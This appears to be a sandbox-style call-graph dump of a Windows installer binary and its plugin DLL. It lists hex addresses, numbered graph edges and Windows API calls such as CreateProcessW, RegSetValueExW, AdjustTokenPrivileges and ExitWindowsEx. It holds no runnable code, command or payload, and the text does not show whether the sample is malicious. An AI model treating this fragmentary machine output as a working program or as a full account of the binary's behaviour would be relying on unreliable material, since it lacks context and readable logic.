6eac12bb GlobalAlloc 5119->5203 5120->5062 5205 6eac16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5123->5205 5124 6eac22d8 5124->5118 5134 6eac2302 GetProcAddress 5124->5134 5126->5106 5126->5109 5126->5111 5126->5112 5126->5115 5126->5119 5126->5120 5127 6eac2067 GlobalFree 5126->5127 5128 6eac21ae 5126->5128 5129 6eac12cc 2 API calls 5126->5129 5130 6eac1dcd 5126->5130 5127->5126 5128->5120 5133 6eac2216 lstrcpyW 5128->5133 5129->5126 5130->5126 5198 6eac162f GlobalSize GlobalAlloc 5130->5198 5131 6eac233f 5131->5120 5133->5120 5134->5118 5135 6eac212f 5135->5062 5144 6eac2498 5136->5144 5138 6eac25c1 GlobalFree 5139 6eac186f 5138->5139 5138->5144 5139->5070 5139->5075 5139->5078 5140 6eac256b GlobalAlloc 5143 6eac2582 5140->5143 5141 6eac2540 GlobalAlloc WideCharToMultiByte 5141->5138 5142 6eac12cc GlobalAlloc lstrcpynW 5142->5144 5143->5138 5211 6eac27a4 5143->5211 5144->5138 5144->5140 5144->5141 5144->5142 5144->5143 5207 6eac135a 5144->5207 5148 6eac2baa 5146->5148 5147 6eac2c4f CreateFileA 5151 6eac2c6d 5147->5151 5148->5147 5150 6eac2d39 5150->5070 5214 6eac2b42 5151->5214 5153 6eac2453 5152->5153 5154 6eac245e GlobalAlloc 5153->5154 5155 6eac1868 5153->5155 5154->5153 5155->5064 5160 6eac2840 5156->5160 5157 6eac28ee 5159 6eac28f4 GlobalSize 5157->5159 5161 6eac28fe 5157->5161 5158 6eac28db GlobalAlloc 5158->5161 5159->5161 5160->5157 5160->5158 5161->5090 5163 6eac2e2e 5162->5163 5164 6eac2e6e GlobalFree 5163->5164 5218 6eac12bb GlobalAlloc 5165->5218 5167 6eac26d8 MultiByteToWideChar 5169 6eac265f 5167->5169 5168 6eac270b lstrcpynW 5168->5169 5169->5167 5169->5168 5170 6eac271e wsprintfW 5169->5170 5171 6eac2742 GlobalFree 5169->5171 5172 6eac2777 GlobalFree 5169->5172 5173 6eac1312 2 API calls 5169->5173 5219 6eac1381 5169->5219 5170->5169 5171->5169 5172->5079 5173->5169 5223 6eac12bb GlobalAlloc 5175->5223 5177 6eac1659 5178 6eac1666 2 API calls 5177->5178 5179 6eac1663 5178->5179 5180 6eac1312 5179->5180 5181 6eac131b GlobalAlloc lstrcpynW 5180->5181 5182 6eac1355 GlobalFree 5180->5182 5181->5182 5182->5088 5184 6eac169f lstrcpyW 5183->5184 5185 6eac1672 wsprintfW 5183->5185 5188 6eac16b8 5184->5188 5185->5188 5188->5091 5190 6eac2626 5189->5190 5192 6eac1931 5189->5192 5191 6eac2642 GlobalFree 5190->5191 5190->5192 5191->5190 5192->5098 5192->5099 5194 6eac1312 2 API calls 5193->5194 5195 6eac15fe 5194->5195 5195->5092 5196->5104 5197->5126 5199 6eac164d 5198->5199 5199->5130 5206 6eac12bb GlobalAlloc 5200->5206 5202 6eac12db lstrcpynW 5202->5120 5203->5135 5204->5124 5205->5131 5206->5202 5208 6eac1361 5207->5208 5209 6eac12cc 2 API calls 5208->5209 5210 6eac137f 5209->5210 5210->5144 5212 6eac2808 5211->5212 5213 6eac27b2 VirtualAlloc 5211->5213 5212->5143 5213->5212 5215 6eac2b4d 5214->5215 5216 6eac2b5d 5215->5216 5217 6eac2b52 GetLastError 5215->5217 5216->5150 5217->5216 5218->5169 5220 6eac13ac 5219->5220 5221 6eac138a 5219->5221 5220->5169 5221->5220 5222 6eac1390 lstrcpyW 5221->5222 5222->5220 5223->5177 5531 402b59 5532 402b60 5531->5532 5533 402bab 5531->5533 5536 402d84 17 API calls 5532->5536 5541 402ba9 5532->5541 5534 4068d4 5 API calls 5533->5534 5535 402bb2 5534->5535 5537 402da6 17 API calls 5535->5537 5538 402b6e 5536->5538 5539 402bbb 5537->5539 5540 402d84 17 API calls 5538->5540 5539->5541 5542 402bbf IIDFromString 5539->5542 5544 402b7a 5540->5544 5542->5541 5543 402bce 5542->5543 5543->5541 5549 406507 lstrcpynW 5543->5549 5548 40644e wsprintfW 5544->5548 5547 402beb CoTaskMemFree 5547->5541 5548->5541 5549->5547 5550 402a5b 5551 402d84 17 API calls 5550->5551 5552 402a61 5551->5552 5553 402aa4 5552->5553 5554 402a88 5552->5554 5563 40292e 5552->5563 5555 402abe 5553->5555 5556 402aae 5553->5556 5557 402a8d 5554->5557 5558 402a9e 5554->5558 5560 406544 17 API calls 5555->5560 5559 402d84 17 API calls 5556->5559 5564 406507 lstrcpynW 5557->5564 5565 40644e wsprintfW 5558->5565 5559->5563 5560->5563 5564->5563 5565->5563 5247 40175c 5248 402da6 17 API calls 5247->5248 5249 401763 5248->5249 5250 406026 2 API calls 5249->5250 5251 40176a 5250->5251 5252 406026 2 API calls 5251->5252 5252->5251 5566 401d5d 5567 402d84 17 API calls 5566->5567 5568 401d6e SetWindowLongW 5567->5568 5569 402c2a 5568->5569 5570 4054dd 5571 405501 5570->5571 5572 4054ed 5570->5572 5574 405509 IsWindowVisible 5571->5574 5580 405520 5571->5580 5573 4054f3 5572->5573 5582 40554a 5572->5582 5576 4044af SendMessageW 5573->5576 5577 405516 5574->5577 5574->5582 5575 40554f CallWindowProcW 5578 4054fd 5575->5578 5576->5578 5579 404e1e 5 API calls 5577->5579 5579->5580 5580->5575 5581 404e9e 4 API calls 5580->5581 5581->5582 5582->5575 5253 401ede 5254 402d84 17 API calls 5253->5254 5255 401ee4 5254->5255 5256 402d84 17 API calls 5255->5256 5257 401ef0 5256->5257 5258 401f07 EnableWindow 5257->5258 5259 401efc ShowWindow 5257->5259 5260 402c2a 5258->5260 5259->5260 5583 4028de 5584 4028e6 5583->5584 5585 4028ea FindNextFileW 5584->5585 5588 4028fc 5584->5588 5586 402943 5585->5586 5585->5588 5589 406507 lstrcpynW 5586->5589 5589->5588 5590 6eac170d 5591 6eac15b6 GlobalFree 5590->5591 5593 6eac1725 5591->5593 5592 6eac176b GlobalFree 5593->5592 5594 6eac1740 5593->5594 5595 6eac1757 VirtualFree 5593->5595 5594->5592 5595->5592 5603 401563 5604 402ba4 5603->5604 5607 40644e wsprintfW 5604->5607 5606 402ba9 5607->5606 4449 403f64 4450 403f7c 4449->4450 4451 4040dd 4449->4451 4450->4451 4452 403f88 4450->4452 4453 40412e 4451->4453 4454 4040ee GetDlgItem GetDlgItem 4451->4454 4456 403f93 SetWindowPos 4452->4456 4457 403fa6 4452->4457 4455 404188 4453->4455 4463 401389 2 API calls 4453->4463 4522 404463 4454->4522 4476 4040d8 4455->4476 4528 4044af 4455->4528 4456->4457 4460 403ff1 4457->4460 4461 403faf ShowWindow 4457->4461 4466 404010 4460->4466 4467 403ff9 DestroyWindow 4460->4467 4464 4040ca 4461->4464 4465 403fcf GetWindowLongW 4461->4465 4462 404118 KiUserCallbackDispatcher 4525 40140b 4462->4525 4469 404160 4463->4469 4544 4044ca 4464->4544 4465->4464 4471 403fe8 ShowWindow 4465->4471 4472 404015 SetWindowLongW 4466->4472 4473 404026 4466->4473 4521 4043ec 4467->4521 4469->4455 4475 404164 SendMessageW 4469->4475 4471->4460 4472->4476 4473->4464 4474 404032 GetDlgItem 4473->4474 4479 404060 4474->4479 4480 404043 SendMessageW IsWindowEnabled 4474->4480 4475->4476 4477 40140b 2 API calls 4493 40419a 4477->4493 4478 4043ee DestroyWindow EndDialog 4478->4521 4483 40406d 4479->4483 4485 4040b4 SendMessageW 4479->4485 4486 404080 4479->4486 4495 404065 4479->4495 4480->4476 4480->4479 4481 40441d ShowWindow 4481->4476 4482 406544 17 API calls 4482->4493 4483->4485 4483->4495 4484 404463 18 API calls 4484->4493 4485->4464 4489 404088 4486->4489 4490 40409d 4486->4490 4488 40409b 4488->4464 4492 40140b 2 API calls 4489->4492 4491 40140b 2 API calls 4490->4491 4494 4040a4 4491->4494 4492->4495 4493->4476 4493->4477 4493->4478 4493->4482 4493->4484 4496 404463 18 API calls 4493->4496 4512 40432e DestroyWindow 4493->4512 4494->4464 4494->4495 4541 40443c 4495->4541 4497 404215 GetDlgItem 4496->4497 4498 404232 ShowWindow KiUserCallbackDispatcher 4497->4498 4499 40422a 4497->4499 4531 404485 KiUserCallbackDispatcher 4498->4531 4499->4498 4501 40425c EnableWindow 4506 404270 4501->4506 4502 404275 GetSystemMenu EnableMenuItem SendMessageW 4503 4042a5 SendMessageW 4502->4503 4502->4506 4503->4506 4506->4502 4532 404498 SendMessageW 4506->4532 4533 403f45 4506->4533 4536 406507 lstrcpynW 4506->4536 4508 4042d4 lstrlenW 4509 406544 17 API calls 4508->4509 4510 4042ea SetWindowTextW 4509->4510 4537 401389 4510->4537 4513 404348 CreateDialogParamW 4512->4513 4512->4521 4514 40437b 4513->4514 4513->4521 4515 404463 18 API calls 4514->4515 4516 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4515->4516 4517 401389 2 API calls 4516->4517 4518 4043cc 4517->4518 4518->4476 4519 4043d4 ShowWindow 4518->4519 4520 4044af SendMessageW 4519->4520 4520->4521 4521->4476 4521->4481 4523 406544 17 API calls 4522->4523 4524 40446e SetDlgItemTextW 4523->4524 4524->4462 4526 401389 2 API calls 4525->4526 4527 401420 4526->4527 4527->4453 4529 4044c7 4528->4529 4530 4044b8 SendMessageW 4528->4530 4529->4493 4530->4529 4531->4501 4532->4506 4534 406544 17 API calls 4533->4534 4535 403f53 SetWindowTextW 4534->4535 4535->4506 4536->4508 4539 401390 4537->4539 4538 4013fe 4538->4493 4539->4538 4540 4013cb MulDiv SendMessageW 4539->4540 4540->4539 4542 404443 4541->4542 4543 404449 SendMessageW 4541->4543 4542->4543 4543->4488 4545 40458d 4544->4545 4546 4044e2 GetWindowLongW 4544->4546 4545->4476 4546->4545 4547 4044f7 4546->4547 4547->4545 4548 404524 GetSysColor 4547->4548 4549 404527 4547->4549 4548->4549 4550 404537 SetBkMode 4549->4550 4551 40452d SetTextColor 4549->4551 4552 404555 4550->4552 4553 40454f GetSysColor 4550->4553 4551->4550 4554 404566 4552->4554 4555 40455c SetBkColor 4552->4555 4553->4552 4554->4545 4556 404580 CreateBrushIndirect 4554->4556 4557 404579 DeleteObject 4554->4557 4555->4554 4556->4545 4557->4556 5608 401968 5609 402d84 17 API calls 5608->5609 5610 40196f 5609->5610 5611 402d84 17 API calls 5610->5611 5612 40197c 5611->5612 5613 402da6 17 API calls 5612->5613 5614 401993 lstrlenW 5613->5614 5615 4019a4 5614->5615 5618 4019e5 5615->5618 5620 406507 lstrcpynW 5615->5620 5617 4019d5 5617->5618 5619 4019da lstrlenW 5617->5619 5619->5618 5620->5617 5621 40166a 5622 402da6 17 API calls 5621->5622 5623 401670 5622->5623 5624 40683d 2 API calls 5623->5624 5625 401676 5624->5625 5626 402aeb 5627 402d84 17 API calls 5626->5627 5628 402af1 5627->5628 5629 40292e 5628->5629 5630 406544 17 API calls 5628->5630 5630->5629 4631 4026ec 4645 402d84 4631->4645 4633 402838 4634 402745 ReadFile 4634->4633 4642 4026fb 4634->4642 4635 4027de 4635->4633 4635->4642 4648 4060d8 SetFilePointer 4635->4648 4636 40607a ReadFile 4636->4642 4637 402785 MultiByteToWideChar 4637->4642 4638 40283a 4657 40644e wsprintfW 4638->4657 4641 4027ab SetFilePointer MultiByteToWideChar 4641->4642 4642->4633 4642->4634 4642->4635 4642->4636 4642->4637 4642->4638 4642->4641 4644 40284b 4642->4644 4643 40286c SetFilePointer 4643->4633 4644->4633 4644->4643 4646 406544 17 API calls 4645->4646 4647 402d99 4646->4647 4647->4642 4649 4060f4 4648->4649 4652 40610c 4648->4652 4650 40607a ReadFile 4649->4650 4651 406100 4650->4651 4651->4652 4653 406115 SetFilePointer 4651->4653 4654 40613d SetFilePointer 4651->4654 4652->4635 4653->4654 4655 406120 4653->4655 4654->4652 4656 4060a9 WriteFile 4655->4656 4656->4652 4657->4633 5631 6eac1000 5632 6eac101b 5 API calls 5631->5632 5633 6eac1019 5632->5633 4658 40176f 4659 402da6 17 API calls 4658->4659 4660 401776 4659->4660 4661 401796 4660->4661 4662 40179e 4660->4662 4718 406507 lstrcpynW 4661->4718 4719 406507 lstrcpynW 4662->4719 4665 40179c 4669 40678e 5 API calls 4665->4669 4666 4017a9 4667 405dd6 3 API calls 4666->4667 4668 4017af lstrcatW 4667->4668 4668->4665 4679 4017bb 4669->4679 4670 40683d 2 API calls 4670->4679 4671 405fd2 2 API calls 4671->4679 4673 4017cd CompareFileTime 4673->4679 4674 40188d 4675 405569 24 API calls 4674->4675 4677 401897 4675->4677 4676 405569 24 API calls 4685 401879 4676->4685 4697 4032b4 4677->4697 4679->4670 4679->4671 4679->4673 4679->4674 4683 406544 17 API calls 4679->4683 4686 406507 lstrcpynW 4679->4686 4694 401864 4679->4694 4696 405ff7 GetFileAttributesW CreateFileW 4679->4696 4720 405b67 4679->4720 4681 4018be SetFileTime 4682 4018d0 FindCloseChangeNotification 4681->4682 4684 4018e1 4682->4684 4682->4685 4683->4679 4687 4018e6 4684->4687 4688 4018f9 4684->4688 4686->4679 4689 406544 17 API calls 4687->4689 4690 406544 17 API calls 4688->4690 4692 4018ee lstrcatW 4689->4692 4693 401901 4690->4693 4692->4693 4693->4685 4695 405b67 MessageBoxIndirectW 4693->4695 4694->4676 4694->4685 4695->4685 4696->4679 4698 4032cd 4697->4698 4699 4032f8 4698->4699 4734 4034af SetFilePointer 4698->4734 4724 403499 4699->4724 4703 403315 GetTickCount 4714 403328 4703->4714 4704 403439 4705 40343d 4704->4705 4710 403455 4704->4710 4707 403499 ReadFile 4705->4707 4706 4018aa 4706->4681 4706->4682 4707->4706 4708 403499 ReadFile 4708->4710 4709 403499 ReadFile 4709->4714 4710->4706 4710->4708 4711 4060a9 WriteFile 4710->4711 4711->4710 4713 40338e GetTickCount 4713->4714 4714->4706 4714->4709 4714->4713 4715 4033b7 MulDiv wsprintfW 4714->4715 4717 4060a9 WriteFile 4714->4717 4727 406a4f 4714->4727 4716 405569 24 API calls 4715->4716 4716->4714 4717->4714 4718->4665 4719->4666 4723 405b7c 4720->4723 4721 405bc8 4721->4679 4722 405b90 MessageBoxIndirectW 4722->4721 4723->4721 4723->4722 4725 40607a ReadFile 4724->4725 4726 403303 4725->4726 4726->4703 4726->4704 4726->4706 4728 406a74 4727->4728 4731 406a7c 4727->4731 4728->4714 4729 406b03 GlobalFree 4730 406b0c GlobalAlloc 4729->4730 4730->4728 4730->4731 4731->4728 4731->4729 4731->4730 4732 406b83 GlobalAlloc 4731->4732 4733 406b7a GlobalFree 4731->4733 4732->4728 4732->4731 4733->4732 4734->4699 5634 4072f1 5637 406a82 5634->5637 5635 406b03 GlobalFree 5636 406b0c GlobalAlloc 5635->5636 5636->5637 5638 4073ed 5636->5638 5637->5635 5637->5636 5637->5637 5637->5638 5639 406b83 GlobalAlloc 5637->5639 5640 406b7a GlobalFree 5637->5640 5639->5637 5639->5638 5640->5639 5641 401a72 5642 402d84 17 API calls 5641->5642 5643 401a7b 5642->5643 5644 402d84 17 API calls 5643->5644 5645 401a20 5644->5645 4744 401573 4745 401583 ShowWindow 4744->4745 4746 40158c 4744->4746 4745->4746 4747 402c2a 4746->4747 4748 40159a ShowWindow 4746->4748 4748->4747 5646 403b74 5647 403b7f 5646->5647 5648 403b83 5647->5648 5649 403b86 GlobalAlloc 5647->5649 5649->5648 5650 4023f4 5651 402da6 17 API calls 5650->5651 5652 402403 5651->5652 5653 402da6 17 API calls 5652->5653 5654 40240c 5653->5654 5655 402da6 17 API calls 5654->5655 5656 402416 GetPrivateProfileStringW 5655->5656 5657 4014f5 SetForegroundWindow 5658 402c2a 5657->5658 5659 401ff6 5660 402da6 17 API calls 5659->5660 5661 401ffd 5660->5661 5662 40683d 2 API calls 5661->5662 5663 402003 5662->5663 5665 402014 5663->5665 5666 40644e wsprintfW 5663->5666 5666->5665 4790 4034f7 SetErrorMode GetVersionExW 4791 403581 4790->4791 4792 403549 GetVersionExW 4790->4792 4793 4035da 4791->4793 4794 4068d4 5 API calls 4791->4794 4792->4791 4795 406864 3 API calls 4793->4795 4794->4793 4796 4035f0 lstrlenA 4795->4796 4796->4793 4797 403600 4796->4797 4798 4068d4 5 API calls 4797->4798 4799 403607 4798->4799 4800 4068d4 5 API calls 4799->4800 4801 40360e 4800->4801 4802 4068d4 5 API calls 4801->4802 4803 40361a #17 OleInitialize SHGetFileInfoW 4802->4803 4881 406507 lstrcpynW 4803->4881 4806 403667 GetCommandLineW 4882 406507 lstrcpynW 4806->4882 4808 403679 4809 405e03 CharNextW 4808->4809 4810 40369f CharNextW 4809->4810 4816 4036b0 4810->4816 4811 4037ae 4812 4037c2 GetTempPathW 4811->4812 4883 4034c6 4812->4883 4814 4037da 4817 403834 DeleteFileW 4814->4817 4818 4037de GetWindowsDirectoryW lstrcatW 4814->4818 4815 405e03 CharNextW 4815->4816 4816->4811 4816->4815 4824 4037b0 4816->4824 4893 40307d GetTickCount GetModuleFileNameW 4817->4893 4819 4034c6 12 API calls 4818->4819 4821 4037fa 4819->4821 4821->4817 4823 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4821->4823 4822 403847 4830 405e03 CharNextW 4822->4830 4853 40390b 4822->4853 4866 4038fc 4822->4866 4825 4034c6 12 API calls 4823->4825 4977 406507 lstrcpynW 4824->4977 4829 40382c 4825->4829 4829->4817 4829->4853 4834 403869 4830->4834 4832 403a33 4835 405b67 MessageBoxIndirectW 4832->4835 4833 403a48 4836 403a50 GetCurrentProcess OpenProcessToken 4833->4836 4837 403ac6 ExitProcess 4833->4837 4839 4038d2 4834->4839 4840 403913 4834->4840 4841 403a40 ExitProcess 4835->4841 4842 403a96 4836->4842 4843 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 4836->4843 4844 405ede 18 API calls 4839->4844 4846 405ad2 5 API calls 4840->4846 4845 4068d4 5 API calls 4842->4845 4843->4842 4847 4038de 4844->4847 4848 403a9d 4845->4848 4849 403918 lstrcatW 4846->4849 4847->4853 4978 406507 lstrcpynW 4847->4978 4852 403ab2 ExitWindowsEx 4848->4852 4856 403abf 4848->4856 4850 403934 lstrcatW lstrcmpiW 4849->4850 4851 403929 lstrcatW 4849->4851 4850->4853 4854 403954 4850->4854 4851->4850 4852->4837 4852->4856 4985 403adc 4853->4985 4857 403960 4854->4857 4858 403959 4854->4858 4860 40140b 2 API calls 4856->4860 4862 405ab5 2 API calls 4857->4862 4861 405a38 4 API calls 4858->4861 4859 4038f1 4979 406507 lstrcpynW 4859->4979 4860->4837 4864 40395e 4861->4864 4865 403965 SetCurrentDirectoryW 4862->4865 4864->4865 4867 403982 4865->4867 4868 403977 4865->4868 4921 403bb6 4866->4921 4981 406507 lstrcpynW 4867->4981 4980 406507 lstrcpynW 4868->4980 4871 406544 17 API calls 4872 4039c4 DeleteFileW 4871->4872 4873 4039d0 CopyFileW 4872->4873 4878 40398f 4872->4878 4873->4878 4874 403a1a 4876 4062c7 36 API calls 4874->4876 4875 4062c7 36 API calls 4875->4878 4876->4853 4877 406544 17 API calls 4877->4878 4878->4871 4878->4874 4878->4875 4878->4877 4880 403a04 CloseHandle 4878->4880 4982 405aea CreateProcessW 4878->4982 4880->4878 4881->4806 4882->4808 4884 40678e 5 API calls 4883->4884 4885 4034d2 4884->4885 4886 4034dc 4885->4886 4887 405dd6 3 API calls 4885->4887 4886->4814 4888 4034e4 4887->4888 4889 405ab5 2 API calls 4888->4889 4890 4034ea 4889->4890 4992 406026 4890->4992 4996 405ff7 GetFileAttributesW CreateFileW 4893->4996 4895 4030bd 4914 4030cd 4895->4914 4997 406507 lstrcpynW 4895->4997 4897 4030e3 4898 405e22 2 API calls 4897->4898 4899 4030e9 4898->4899 4998 406507 lstrcpynW 4899->4998 4901 4030f4 GetFileSize 4902 4031ee 4901->4902 4920 40310b 4901->4920 4999 403019 4902->4999 4904 4031f7 4906 403227 GlobalAlloc 4904->4906 4904->4914 5011 4034af SetFilePointer 4904->5011 4905 403499 ReadFile 4905->4920 5010 4034af SetFilePointer 4906->5010 4909 40325a 4911 403019 6 API calls 4909->4911 4910 403242 4913 4032b4 35 API calls 4910->4913 4911->4914 4912 403210 4915 403499 ReadFile 4912->4915 4918 40324e 4913->4918 4914->4822 4917 40321b 4915->4917 4916 403019 6 API calls 4916->4920 4917->4906 4917->4914 4918->4914 4918->4918 4919 40328b SetFilePointer 4918->4919 4919->4914 4920->4902 4920->4905 4920->4909 4920->4914 4920->4916 4922 4068d4 5 API calls 4921->4922 4923 403bca 4922->4923 4924 403bd0 GetUserDefaultUILanguage 4923->4924 4925 403be2 4923->4925 5016 40644e wsprintfW 4924->5016 4927 4063d5 3 API calls 4925->4927 4929 403c12 4927->4929 4928 403be0 5017 403e8c 4928->5017 4930 403c31 lstrcatW 4929->4930 4931 4063d5 3 API calls 4929->4931 4930->4928 4931->4930 4934 405ede 18 API calls 4935 403c63 4934->4935 4936 403cf7 4935->4936 4938 4063d5 3 API calls 4935->4938 4937 405ede 18 API calls 4936->4937 4939 403cfd 4937->4939 4940 403c95 4938->4940 4941 403d0d LoadImageW 4939->4941 4942 406544 17 API calls 4939->4942 4940->4936 4945 403cb6 lstrlenW 4940->4945 4949 405e03 CharNextW 4940->4949 4943 403db3 4941->4943 4944 403d34 RegisterClassW 4941->4944 4942->4941 4948 40140b 2 API calls 4943->4948 4946 403dbd 4944->4946 4947 403d6a SystemParametersInfoW CreateWindowExW 4944->4947 4950 403cc4 lstrcmpiW 4945->4950 4951 403cea 4945->4951 4946->4853 4947->4943 4952 403db9 4948->4952 4954 403cb3 4949->4954 4950->4951 4955 403cd4 GetFileAttributesW 4950->4955 4953 405dd6 3 API calls 4951->4953 4952->4946 4956 403e8c 18 API calls 4952->4956 4957 403cf0 4953->4957 4954->4945 4958 403ce0 4955->4958 4959 403dca 4956->4959 5025 406507 lstrcpynW 4957->5025 4958->4951 4961 405e22 2 API calls 4958->4961 4962 403dd6 ShowWindow 4959->4962 4963 403e59 4959->4963 4961->4951 4965 406864 3 API calls 4962->4965 4964 40563c 5 API calls 4963->4964 4966 403e5f 4964->4966 4967 403dee 4965->4967 4968 403e7b 4966->4968 4970 403e63 4966->4970 4969 403dfc GetClassInfoW 4967->4969 4972 406864 3 API calls 4967->4972 4971 40140b 2 API calls 4968->4971 4973 403e10 GetClassInfoW RegisterClassW 4969->4973 4974 403e26 DialogBoxParamW 4969->4974 4970->4946 4975 40140b 2 API calls 4970->4975 4971->4946 4972->4969 4973->4974 4976 40140b 2 API calls 4974->4976 4975->4946 4976->4946 4977->4812 4978->4859 4979->4866 4980->4867 4981->4878 4983 405b29 4982->4983 4984 405b1d CloseHandle 4982->4984 4983->4878 4984->4983 4986 403af4 4985->4986 4987 403ae6 CloseHandle 4985->4987 5027 403b21 4986->5027 4987->4986 4990 405c13 67 API calls 4991 403a28 OleUninitialize 4990->4991 4991->4832 4991->4833 4993 406033 GetTickCount GetTempFileNameW 4992->4993 4994 406069 4993->4994 4995 4034f5 4993->4995 4994->4993 4994->4995 4995->4814 4996->4895 4997->4897 4998->4901 5000 403022 4999->5000 5001 40303a 4999->5001 5002 403032 5000->5002 5003 40302b DestroyWindow 5000->5003 5004 403042 5001->5004 5005 40304a GetTickCount 5001->5005 5002->4904 5003->5002 5012 406910 5004->5012 5007 403058 CreateDialogParamW ShowWindow 5005->5007 5008 40307b 5005->5008 5007->5008 5008->4904 5010->4910 5011->4912 5013 40692d PeekMessageW 5012->5013 5014 406923 DispatchMessageW 5013->5014 5015 403048 5013->5015 5014->5013 5015->4904 5016->4928 5018 403ea0 5017->5018 5026 40644e wsprintfW 5018->5026 5020 403f11 5021 403f45 18 API calls 5020->5021 5023 403f16 5021->5023 5022 403c41 5022->4934 5023->5022 5024 406544 17 API calls 5023->5024 5024->5023 5025->4936 5026->5020 5028 403b2f 5027->5028 5029 403af9 5028->5029 5030 403b34 FreeLibrary GlobalFree 5028->5030 5029->4990 5030->5029 5030->5030 5667 401b77 5668 402da6 17 API calls 5667->5668 5669 401b7e 5668->5669 5670 402d84 17 API calls 5669->5670 5671 401b87 wsprintfW 5670->5671 5672 402c2a 5671->5672 5673 40167b 5674 402da6 17 API calls 5673->5674 5675 401682 5674->5675 5676 402da6 17 API calls 5675->5676 5677 40168b 5676->5677 5678 402da6 17 API calls 5677->5678 5679 401694 MoveFileW 5678->5679 5680 4016a0 5679->5680 5681 4016a7 5679->5681 5683 401423 24 API calls 5680->5683 5682 40683d 2 API calls 5681->5682 5685 4022f6 5681->5685 5684 4016b6 5682->5684 5683->5685 5684->5685 5686 4062c7 36 API calls 5684->5686 5686->5680 5687 406bfe 5691 406a82 5687->5691 5688 4073ed 5689 406b03 GlobalFree 5690 406b0c GlobalAlloc 5689->5690 5690->5688 5690->5691 5691->5688 5691->5689 5691->5690 5692 406b83 GlobalAlloc 5691->5692 5693 406b7a GlobalFree 5691->5693 5692->5688 5692->5691 5693->5692 5694 4022ff 5695 402da6 17 API calls 5694->5695 5696 402305 5695->5696 5697 402da6 17 API calls 5696->5697 5698 40230e 5697->5698 5699 402da6 17 API calls 5698->5699 5700 402317 5699->5700 5701 40683d 2 API calls 5700->5701 5702 402320 5701->5702 5703 402331 lstrlenW lstrlenW 5702->5703 5707 402324 5702->5707 5705 405569 24 API calls 5703->5705 5704 405569 24 API calls 5708 40232c 5704->5708 5706 40236f SHFileOperationW 5705->5706 5706->5707 5706->5708 5707->5704 5707->5708 5709 4019ff 5710 402da6 17 API calls 5709->5710 5711 401a06 5710->5711 5712 402da6 17 API calls 5711->5712 5713 401a0f 5712->5713 5714 401a16 lstrcmpiW 5713->5714 5715 401a28 lstrcmpW 5713->5715 5716 401a1c 5714->5716 5715->5716 5717 401000 5718 401037 BeginPaint GetClientRect 5717->5718 5720 40100c DefWindowProcW 5717->5720 5721 4010f3 5718->5721 5722 401179 5720->5722 5723 401073 CreateBrushIndirect FillRect DeleteObject 5721->5723 5724 4010fc 5721->5724 5723->5721 5725 401102 CreateFontIndirectW 5724->5725 5726 401167 EndPaint 5724->5726 5725->5726 5727 401112 6 API calls 5725->5727 5726->5722 5727->5726 5728 401d81 5729 401d94 GetDlgItem 5728->5729 5730 401d87 5728->5730 5733 401d8e 5729->5733 5731 402d84 17 API calls 5730->5731 5731->5733 5732 401dd5 GetClientRect LoadImageW SendMessageW 5736 401e33 5732->5736 5738 401e3f 5732->5738 5733->5732 5734 402da6 17 API calls 5733->5734 5734->5732 5737 401e38 DeleteObject 5736->5737 5736->5738 5737->5738 5739 401503 5740 40150b 5739->5740 5742 40151e 5739->5742 5741 402d84 17 API calls 5740->5741 5741->5742 5743 402383 5744 40238a 5743->5744 5747 40239d 5743->5747 5745 406544 17 API calls 5744->5745 5746 402397 5745->5746 5746->5747 5748 405b67 MessageBoxIndirectW 5746->5748 5748->5747 5749 402c05 SendMessageW 5750 402c2a 5749->5750 5751 402c1f InvalidateRect 5749->5751 5751->5750 5752 6eac23e9 5753 6eac2453 5752->5753 5754 6eac245e GlobalAlloc 5753->5754 5755 6eac247d 5753->5755 5754->5753 5763 40248a 5764 402da6 17 API calls 5763->5764 5765 40249c 5764->5765 5766 402da6 17 API calls 5765->5766 5767 4024a6 5766->5767 5780 402e36 5767->5780 5770 402c2a 5771 4024de 5774 4024ea 5771->5774 5776 402d84 17 API calls 5771->5776 5772 402da6 17 API calls 5775 4024d4 lstrlenW 5772->5775 5773 402509 RegSetValueExW 5778 40251f RegCloseKey 5773->5778 5774->5773 5777 4032b4 35 API calls 5774->5777 5775->5771 5776->5774 5777->5773 5778->5770 5781 402e51 5780->5781 5784 4063a2 5781->5784 5785 4063b1 5784->5785 5786 4024b6 5785->5786 5787 4063bc RegCreateKeyExW 5785->5787 5786->5770 5786->5771 5786->5772 5787->5786 5788 40290b 5789 402da6 17 API calls 5788->5789 5790 402912 FindFirstFileW 5789->5790 5791 40293a 5790->5791 5794 402925 5790->5794 5792 402943 5791->5792 5796 40644e wsprintfW 5791->5796 5797 406507 lstrcpynW 5792->5797 5796->5792 5797->5794 5798 40190c 5799 401943 5798->5799 5800 402da6 17 API calls 5799->5800 5801 401948 5800->5801 5802 405c13 67 API calls 5801->5802 5803 401951 5802->5803 5804 6eac10e1 5805 6eac1111 5804->5805 5806 6eac12b0 GlobalFree 5805->5806 5807 6eac11d7 GlobalAlloc 5805->5807 5808 6eac1240 GlobalFree 5805->5808 5809 6eac135a 2 API calls 5805->5809 5810 6eac12ab 5805->5810 5811 6eac1312 2 API calls 5805->5811 5812 6eac129a GlobalFree 5805->5812 5813 6eac1381 lstrcpyW 5805->5813 5814 6eac116b GlobalAlloc 5805->5814 5807->5805 5808->5805 5809->5805 5810->5806 5811->5805 5812->5805 5813->5805 5814->5805 5815 40490d 5816 404943 5815->5816 5817 40491d 5815->5817 5819 4044ca 8 API calls 5816->5819 5818 404463 18 API calls 5817->5818 5820 40492a SetDlgItemTextW 5818->5820 5821 40494f 5819->5821 5820->5816 5822 40190f 5823 402da6 17 API calls 5822->5823 5824 401916 5823->5824 5825 405b67 MessageBoxIndirectW 5824->5825 5826 40191f 5825->5826 4735 402891 4736 402898 4735->4736 4737 402ba9 4735->4737 4738 402d84 17 API calls 4736->4738 4739 40289f 4738->4739 4740 4028ae SetFilePointer 4739->4740 4740->4737 4741 4028be 4740->4741 4743 40644e wsprintfW 4741->4743 4743->4737 5827 401491 5828 405569 24 API calls 5827->5828 5829 401498 5828->5829 5830 401f12 5831 402da6 17 API calls 5830->5831 5832 401f18 5831->5832 5833 402da6 17 API calls 5832->5833 5834 401f21 5833->5834 5835 402da6 17 API calls 5834->5835 5836 401f2a 5835->5836 5837 402da6 17 API calls 5836->5837 5838 401f33 